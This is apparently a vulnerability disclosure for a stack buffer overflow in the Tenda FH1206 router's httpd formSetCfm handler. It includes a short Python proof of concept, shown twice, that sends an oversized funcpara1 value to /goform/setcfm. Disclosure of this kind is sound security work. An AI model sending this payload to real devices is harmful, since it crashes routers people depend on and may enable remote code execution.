Tenda FH1206 V1.2.0.8(8155)_EN
V1.2.0.8(8155)_EN
The Tenda FH1206 V1.2.0.8(8155)_EN has a stack overflow vulnerability located in the formSetCfm function.The v5(var_funcpara1) variable receives the funcpara1 parameter from a POST request and passes it to the save_list_data function.
Within save_list_data, the v5(var_funcpara1) variable is later assigned to the v10 variable. However, since the user has control over the input of funcpara1, the statement sprintf(v10, "%s.list%d", a1, v10); leads to a buffer overflow. There is no size check, so the user-provided a1(var_funcpara1) can exceed the allocated size of the v10 array (64 bytes), thus triggering this security vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.
# formSetCfm
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/setcfm"
data = {'funcname':'save_list_data', 'funcpara1':b'a'*999, 'funcpara2':'test'}
ret = requests.post(url, data)
###Product_version
Tenda FH1206
V1.2.0.8(8155)_EN
###Affected_component
the "formSetCfm" function of /bin/httpd; /bin/httpd
###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/setcfm"
data = {'funcname':'save_list_data', 'funcpara1':b'a'*999, 'funcpara2':'test'}
ret = requests.post(url, data)
###Discription
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter at ip/goform/setcfm.
###Refernce
<https://palm-vertebra-fe9.notion.site/formSetCfm-7d199da0fd0740988a498304905e2dd1>
<https://www.tendacn.com/hk/download/detail-2344.html>